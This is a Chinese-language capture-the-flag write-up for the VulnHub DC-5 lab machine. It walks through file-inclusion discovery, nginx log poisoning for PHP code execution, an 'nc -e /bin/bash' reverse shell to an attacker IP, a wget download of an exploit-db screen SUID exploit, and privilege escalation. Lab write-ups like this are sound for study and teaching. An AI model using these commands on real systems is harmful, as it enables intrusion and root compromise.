vulnhub dc-5

1.信息搜集
官方文档描述

主要内容不会使用到ssh，进入的方式很难被发现，是改变页面刷新的方法，只有一个flag
nmap扫描
存活主机
192.168.85.176
端口
80
111
中间件：
nginx
2.访问网站，进行进一步信息搜集

通过这两张图片的对比发现最下面的内容发生了变化
一般来说页脚的文件都是包含进来的，猜测页脚文件名footer.php
访问发现是成功的

在thankyou.php文件位置可能有文件包含，是通过contact位置提交的
使用文件包含可能的文件名尝试以下file,filename等
通过尝试filen是传入的参数，当不知道时就可以尝试使用爆破参数名

3.ua头日志包含写shell
nginx日志文件位置/var/log/nginx/access.log
burp抓包

post传入

1=phpinfo();

成功执行

连接蚁剑

4.提权
nc反弹shell到kali

nc -e /bin/bash 192.168.85.129 4455

kali nc监听

nc -lvnp 4455

python构建交互式shell

python -c "import pty;pty.spawn('/bin/bash')"

进行信息搜集
家目录，tmp目录等没发现信息
尝试suid提权

find / -perm -u=s -type f 2>/dev/null

发现screen等,其他也要关注，第一个不成功就用其他的

searchsploit screen

找到相关版本

定位exp位置

locate linux/local/41154.sh 

上传到靶机
cp /usr/share/exploitdb/exploits/linux/local/41154.sh 1.sh
python -m http.server 8000

靶机下载

wget http://192.168.85.129:8000/1.sh

执行exp

linux第三方提权
dc-5